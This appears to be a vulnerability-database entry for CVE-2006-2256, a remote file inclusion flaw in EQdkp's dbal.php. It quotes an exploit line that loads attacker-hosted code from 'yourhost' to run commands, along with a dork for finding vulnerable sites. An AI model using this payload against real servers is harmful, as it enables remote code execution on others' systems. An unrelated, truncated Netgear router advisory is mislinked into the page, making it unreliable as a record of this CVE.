CVE-2006-2256
published 2006-05-09
Priority P346 · medium · 6.4 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 7.31% (93.6th percentile)
PHP remote file inclusion vulnerability in includes/dbal.php in EQdkp 1.3.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the eqdkp_root_path parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eqdkp | eqdkp | — | — |
| eqdkp | eqdkp | — | — |
| eqdkp | eqdkp | — | — |
| eqdkp | eqdkp | — | — |
No detection rules found.
Exploit-DB
Netgear DG632 Router - Remote Denial of Service
exploitdb·2009-06-15
CVE-2009-2256 Netgear DG632 Router - Remote Denial of Service
---
Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: [email protected]
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009
I. DESCRIPTION
The Netgear DG632 router has a web interface which runs on port 80. This
allows an admin to login and administer the device's settings. However,
a Denial of Service (DoS) vulnerability exists that causes the web interface
to crash and stop responding to further requests.
II. DETAILS
Within the "/cgi-bin/" directory of the administrative web interface exists a
file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST
request for this file causes the web server to
Exploit-DB
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion
exploitdb·2006-05-07
CVE-2006-2256 EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion
---
Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew
Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
# milw0rm.com [2006-05-07]
No writeups or analysis indexed.
http://secunia.com/advisories/20040
http://www.osvdb.org/25339
http://www.securityfocus.com/bid/17888
http://www.vupen.com/english/advisories/2006/1693
https://exchange.xforce.ibmcloud.com/vulnerabilities/26357
https://www.exploit-db.com/exploits/1764
2006-05-09
Published